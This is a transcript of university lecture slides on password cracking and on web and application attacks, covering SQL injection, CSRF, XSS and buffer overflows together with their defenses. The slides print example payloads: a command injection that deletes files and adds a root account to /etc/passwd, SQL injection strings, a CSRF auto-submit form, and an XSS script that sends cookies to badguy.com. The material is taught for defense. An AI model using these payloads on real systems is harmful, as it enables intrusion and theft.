1. password attack · the host does not need to know the passwords. the host just has to be able to...
TRANSCRIPT
1. PASSWORD ATTACK
2. APPLICATION ATTACK
References:
1. Bruce Schneier, Applied Cryptography
2. CEH v7 Tutorial
21/03/2017
2
Authentication
Authentication using One-Way Functions
Authentication using Public-Key Cryptography
Attack
21/03/2017 3
Authentication
21/03/2017 4
When Alice logs into a host computer, how does the host know who she is?
How does the host know she is not Eve trying to falsify Alice’s identity?
Traditionally, passwords solve this problem.
Both Alice and the host know this secret piece of knowledge and the hostrequests it from Alice every time she tries to log in.
21/03/2017 5
Authentication using
One-Way Functions
21/03/2017 6
The host does not need to know the passwords.
The host just has to be able to differentiate valid passwords from invalidpasswords. This is easy with one-way functions.
Instead of storing passwords, the host stores one-way functions of thepasswords.
21/03/2017 7
1. Alice sends the host her password.
2. The host performs a one-way function on the password.
3. The host compares the result of the one-way function to the value itpreviously stored.
21/03/2017 8
Since the host no longer stores a table of everybody’s valid password, thethreat of someone breaking into the host and stealing the password list ismitigated.
The list of passwords operated on by the one-way function is useless, becausethe one-way function cannot be reversed to recover the passwords.
21/03/2017 9
Authentication using
Public-Key Cryptography
21/03/2017 10
PROBLEM :
When Alice sends her password to her host, anyone who has access to herdata path can read it.
Eve can be at any one of those points, listening to Alice’s login sequence. IfEve has access to the processor memory of the host, she can see thepassword before the host hashes it.
21/03/2017 11
Public-key cryptography can solve this
problem.
The hostkeeps a file of every user’s public key.
All userskeep their
own private keys. 21/03/2017 12
• The host sends Alice a randomstring.
• Alice encrypts the string with herprivate key and sends it back to thehost, along with her name.
• The host looks up Alice’s public keyin its database and decrypts themessage using that public key.
• If the decrypted string matches whatthe host sent Alice in the first place,the host allows Alice access to thesystem.
When logging in, the
protocol proceeds
as follows:
21/03/2017 13
Secure proof-of-identity protocols take thefollowing form:
• Alice performs a computation based on some random numbers and her private key and sends the result to the host.
• The host sends Alice a different random number.
• Alice makes some computation based on the random numbers (both the ones she generated and the one she received from the host) and her private key, and sends the result to the host.
• The host does some computation on the various numbers received from Alice and her public key to verify that she knows her private key.
• If she does, her identity is verified. 21/03/2017 14
If Alice does not trust the host any more than the host trusts Alice, then Alicewill require the host to prove its identity in the same manner.
Step (1) might seem unnecessary and confusing, but it is required to preventattacks against the protocol.
21/03/2017 15
21/03/2017 16
(a) Dictionary attack
(b) Brute force Attack
(c) Hybrid Attack
(d) Syllable Attack
(e) Rule-based Attack
21/03/2017 17
Password Cracking Techniques
(a) Based on familiar password
(b) tries every combination of character
(c) Like dictionary attack, but adds some number and symbol
(d) Combination brute force attack and dictionary attack
(e) Used when the attacker gets some information about
password
21/03/2017 18
21/03/2017 19
Keylogger is a
program that runs in
the background and
allow remote
attackers to record
every keystroke
Trojan enabling
attackers to gets
access to the stored
password in the
attacked computer
Spyware is a type of
malware that allows
attackers to get secret key
gather information about
person or organization
21/03/2017 20
What does spyware do?
Steals user’s personal information and send it to remote server
Monitor user’s online activity
Display annoying pop up and redirect browser to advertising site
Decrease overall system security level
Connects to remote pornography sites
Reduce systems performance and causes software instability
21/03/2017 21
Purpose of Trojan:
Steal information such as password, security codes, credit card information, using keylogger
Delete or replace OS system critical file
Generate fake traffic to create DoS attack
Disable firewall and antivirus
Use victim’s PC for spamming
Use victim’s PC as a botnet
21/03/2017 22
21/03/2017 23
Default password is a password supplies by the manufacturer with new equipment that is password protected
Ex:
www.defaultpassword.com
21/03/2017 24
Windows stores user password in the Security Acccount Manager (SAM) not clear text, but hashed.
21/03/2017 25
References:
1. Network Security. John Mitchell. Standford University
2. CEH v7 Tutorial
21/03/2017
26
Web Attacker
Sets up malicious
site visited by
victim; no control
of network
Alice
System
Web security threat model
Network Attacker
Intercepts and
controls network
communication
Alice
System
Network security threat model
Web Attacker
Alice
System
Network Attacker
Alice
System
SQL Injection
Browser sends malicious input to server
Bad input checking fails to block malicious SQL
CSRF – Cross-site request forgery
Bad web site sends browser request to good web site, using credentials of an innocent victim
XSS – Cross-site scripting
Bad web site sends innocent victim a script that steals information from an honest web site
SQL Injection
Browser sends malicious input to server
Bad input checking leads to malicious SQL query
CSRF – Cross-site request forgery
Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site
XSS – Cross-site scripting
Bad web site sends innocent victim a script that steals information from an honest web site
Inject malicious script into
trusted context
Leverage user’s session at
victim sever
Uses SQL to change meaning of
database command
Background for SQL Injection
Attack goal: execute arbitrary code on the server
Examplecode injection based on eval (PHP)
http://site.com/calc.php (server side calculator)
Attackhttp://site.com/calc.php?exp=“ 10 ; system(‘rm *.*’) ”
(URL encoded)
…
$in = $_GET[‘exp'];
eval('$ans = ' . $in . ';');
…
Example: PHP server-side code for sending email
Attacker can post
OR
$email = $_POST[“email”]
$subject = $_POST[“subject”]
system(“mail $email –s $subject < /tmp/joinmynetwork”)
http://yourdomain.com/mail.php?
subject=foo < /usr/passwd; ls
http://yourdomain.com/mail.php?
[email protected]&subject=foo;
echo “evil::0:0:root:/:/bin/sh">>/etc/passwd; ls
Sample PHP
ProblemWhat if ‘recipient’ is malicious string that changes the meaning of the query?
(the wrong way)
$recipient = $_POST[‘recipient’];
$sql = "SELECT PersonID FROM Person WHERE
Username='$recipient'";
$rs = $db->executeQuery($sql);
38
Victim Server
Victim SQL DB
Attacker
unintended
SQL queryreceive valuable data
1
2
3
39
CardSystems
credit card payment processing company
SQL injection attack in June 2005
put out of business
The Attack
263,000 credit card #s stolen from database
credit card #s stored unencrypted
43 million credit card #s exposed
WordPress SEO plugin by Yoast, March 2015
“The latest version at the time of writing (1.7.3.3) has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities.
“The authenticated Blind SQL Injection vulnerability can be found within the ‘admin/class-bulk-editor-list-table.php’ file. The orderby and order GET parameters are not sufficiently sanitized before being used within a SQL query.
https://wpvulndb.com/vulnerabilities/7841
41
set ok = execute( "SELECT * FROM Users
WHERE user=' " & form(“user”) & " '
AND pwd=' " & form(“pwd”) & “ '” );
if not ok.EOF
login success
else fail;
Is this exploitable?
Web
Server
Web
Browser
(Client)DB
Enter
Username
&
Password
SELECT *
FROM Users
WHERE user='me'
AND pwd='1234'
Normal Query
43
Suppose user = “ ' or 1=1 -- ” (URL encoded)
Then scripts does:ok = execute( SELECT …
WHERE user= ' ' or 1=1 -- … )
The “--” causes rest of line to be ignored.
Now ok.EOF is always false and login succeeds.
The bad news: easy login to many sites this way.
44
Suppose user =
“ ′ ; DROP TABLE Users -- ”
Then script does:
ok = execute( SELECT …
WHERE user= ′ ′ ; DROP TABLE Users … )
Deletes user table
Similarly: attacker can add users, reset pwds, etc.
45
Suppose user =
′ ; exec cmdshell
′net user badguy badpwd′ / ADD --
Then script does:ok = execute( SELECT …
WHERE username= ′ ′ ; exec … )
If SQL server context runs as “sa”, attacker gets account on DB server
46
0x 5c \
0x bf 27 ¿′
0x bf 5c
PHP: addslashes( “ ’ or 1 = 1 -- ”)
outputs: “ \’ or 1=1 -- ”
Unicode attack: (GBK)
$user = 0x bf 27
addslashes ($user) 0x bf 5c 27
Correct implementation: mysql_real_escape_string()
′
Never build SQL commands yourself !
Use parameterized/prepared SQL
Use ORM framework
48
Builds SQL queries by properly escaping args: ′ \′
Example: Parameterized SQL: (ASP.NET 1.1)
Ensures SQL arguments are properly escaped.
SqlCommand cmd = new SqlCommand(
"SELECT * FROM UserTable WHERE
username = @User AND
password = @Pwd", dbConnection);
cmd.Parameters.Add("@User", Request[“user”] );
cmd.Parameters.Add("@Pwd", Request[“pwd”] );
cmd.ExecuteReader();
In PHP: bound parameters -- similar function
ServerBrowser
51
Attack Server
Server Victim
User Victim
1
2
4
Q: how long do you stay logged in to Gmail? Facebook? ….
Example:
User logs in to bank.com
Session cookie remains in browser state
User visits another site containing:
<form name=F action=http://bank.com/BillPay.php>
<input name=recipient value=badguy> …
<script> document.F.submit(); </script>
Browser sends user auth cookie with request
Transaction will be fulfilled
Problem:
cookie auth is insufficient when side effects occur
User credentials
Cookie: SessionID=523FA4cd2E
54
Bad web site
Home router
User
1
2
3
4
Fact:
50% of home users have broadband router with a default or no password
Drive-by Pharming attack: User visits malicious site JavaScript at site scans home network looking for broadband router:
• SOP allows “send only” messages
• Detect success using onerror:
<IMG SRC=192.168.0.1 onError = do() >
Once found, login to router and change DNS server
Problem: “send-only” access sufficient to reprogram router
[SRJ’07]
referer: http://www.site.com
referer: http://www.site.com
What if honest site sends POST to attacker.com?
Solution: origin header records redirect
Login CSRF Strict Referer/Origin header validation
Login forms typically submit over HTTPS, not blocked
HTTPS sites, such as banking sites Use strict Referer/Origin validation to prevent CSRF
Other Use Ruby-on-Rails or other framework that
implements secret token method correctly
Origin header Alternative to Referer with fewer privacy problems
Sent only on POST, sends only necessary data
Defense against redirect-based attacks
Attack Server
Victim Server
Victim client
1
2
5
search field on victim.com:
http://victim.com/search.php ? term = apple
Server-side implementation of search.php:
<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET[term] ?> :
. . .
</BODY> </HTML>
echo search term
into response
Consider link: (properly URL encoded)
http://victim.com/search.php ? term =
<script> window.open(
“http://badguy.com?cookie = ” +
document.cookie ) </script>
What if user clicks on this link?
1. Browser goes to victim.com/search.php
2. Victim.com returns
<HTML> Results for <script> … </script>
3. Browser executes script:
Sends badguy.com cookie for victim.com
<html>
Results for
<script>
window.open(http://attacker.com?
... document.cookie ...)
</script>
</html>
Attack Server
Victim Server
Victim client
http://victim.com/search.php ?
term = <script> ... </script>
www.victim.com
www.attacker.com
An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application
Methods for injecting malicious code:Reflected XSS (“type 1”) the attack script is reflected back to the user as part of a page from the
victim site
Stored XSS (“type 2”) the attacker stores the malicious code in a resource managed by the web
application, such as a database
Others, such as DOM-based attacks
Attack Server
Server Victim
User Victim
1
2
5
Email version
Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website.
Injected code redirected PayPal visitors to a page warning users their accounts had been compromised.
Victims were then redirected to a phishing site and prompted to enter sensitive financial data.
Source: http://www.acunetix.com/news/paypal.htm
SQL Injection Bad input checking allows malicious SQL query
Known defenses address problem effectively
CSRF – Cross-site request forgery Forged request leveraging ongoing session
Can be prevented (if XSS problems fixed)
XSS – Cross-site scripting Problem stems from echoing untrusted input
Difficult to prevent; requires care, testing, tools, …
Other server vulnerabilities Increasing knowledge embedded in frameworks, tools, application development
recommendations
Ref
1. Professor Hossein Saiedian. KU electrical negineering and komputer science.
“A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.”
A very common attack mechanism
from 1988 Morris Worm to Code Red, Slammer, Sasser and many others
Prevention techniques known
Still of major concern due to
legacy of widely deployed buggy
continued careless programming techniques
Caused by programming error
Allows more data to be stored than capacity available in a fixed sized buffer
buffer can be on stack, heap, global data
Overwriting adjacent memory locations
corruption of program data
unexpected transfer of control
memory access violation
execution of code chosen by attacker
int main(int argc, char *argv[]) {
int valid = FALSE;
char str1[8];
char str2[8];
next_tag(str1);
gets(str2);
if (strncmp(str1, str2, 8) == 0)
valid = TRUE;
printf("buffer1: str1(%s), str2(%s),
valid(%d)\n", str1, str2, valid);
}
$ cc -g -o buffer1 buffer1.c$ ./buffer1
START
buffer1: str1(START), str2(START), valid(1)
$ ./buffer1
EVILINPUTVALUE
buffer1: str1(TVALUE),
str2(EVILINPUTVALUE), valid(0)
$ ./buffer1BADINPUTBADINPUT
buffer1: str1(BADINPUT),
str2(BADINPUTBADINPUT), valid(1)
Memory
Address
Before
gets(str2)
After
gets(str2)
Contains
Value of
. . . .
. . . .
. . . .
bffffbf4 34fcffbf
4 . . .
34fcffbf
3 . . .
argv
bffffbf0 01000000
. . . .
01000000
. . . .
argc
bffffbec c6bd0340
. . . @
c6bd0340
. . . @
return
addr
bffffbe8 08fcffbf
. . . .
08fcffbf
. . . .
old base
ptr
bffffbe4 00000000
. . . .
01000000
. . . .
valid
bffffbe0 80640140
. d . @
00640140
. d . @
bffffbdc 54001540
T . . @
4e505554
N P U T
str1[4-7]
bffffbd8 53544152
S T A R
42414449
B A D I
str1[0-3]
bffffbd4 00850408
. . . .
4e505554
N P U T
str2[4-7]
bffffbd0 30561540
0 V . @
42414449
B A D I
str2[0-3]
. . . .
. . . .
. . . .
To exploit a buffer overflow an attacker
must identify a buffer overflow vulnerability in some program
inspection, tracing execution, fuzzing tools
understand how buffer is stored in memory and determine potential for corruption
At machine level all data an array of bytes interpretation depends on instructions used
Modern high-level languages have a strong notion of type and valid operations not vulnerable to buffer overflows
does incur overhead, some limits on use
C and related languages have high-level control structures, but allow direct access to memory hence are vulnerable to buffer overflow
have a large legacy of widely used, unsafe, and hence vulnerable code
Stack frame:
Calling function: needs a data
structure to store the “return”
address and parameters to be
passed
Called function: needs a place
to store its local variables
somewhere different for every call
Occurs when buffer is located on stack
used by Morris Worm
“Smashing the Stack” paper popularized it
Have local variables below saved frame pointer and return address
hence overflow of a local buffer can potentially overwrite these key control items
Attacker overwrites return address with address of desired code
program, system library or loaded in buffer
Buffer overflows are widely exploited
Large amount of vulnerable code in use
despite cause and countermeasures known
Two broad defense approaches
compile-time - harden new programs
run-time - handle attacks on existing programs
Use a modern high-level languages with strong typing
not vulnerable to buffer overflow
compiler enforces range checks and permissible operations on variables
Do have cost in resource use
And restrictions on access to hardware
so still need some code in C like languages
If using potentially unsafe languages eg C
Programmer must explicitly write safe code
by design with new code
extensive after code review of existing code, (e.g., OpenBSD)
Buffer overflow safety a subset of general safe coding techniques
Allow for graceful failure (know how things may go wrong)
check for sufficient space in any buffer
Proposals for safety extensions (library replacements) to C
performance penalties
must compile programs with special compiler
Several safer standard library variants
new functions, e.g. strlcpy()
safer re-implementation of standard functions as a dynamic library, e.g. Libsafe
Stackgaurd: add function entry and exit code to check stack for signs of corruption Use random canary
e.g. Stackguard, Win/GS, GCC
check for overwrite between local variables and saved frame pointer and return address
abort program if change found
issues: recompilation, debugger support
Or save/check safe copy of return address (in a safe, non-corruptible memory area), e.g. Stackshield, RAD
Many BO attacks copy machine code into buffer and xfer ctrl to it
Use virtual memory support to make some regions of memory non-executable (to avoid exec of attacker’s code) e.g. stack, heap, global data
need h/w support in MMU
long existed on SPARC/Solaris systems
recent on x86 Linux/Unix/Windows systems
Issues: support for executable stack code
Manipulate location of key data structures
stack, heap, global data: change address by 1 MB
using random shift for each process
have large address range on modern systems means wasting some has negligible impact
Randomize location of heap buffers and location of standard library functions
Place guard pages between critical regions of memory (or between stack frames)
flagged in MMU (mem mgmt unit) as illegal addresses
any access aborts process
Can even place between stack frames and heap buffers
at execution time and space cost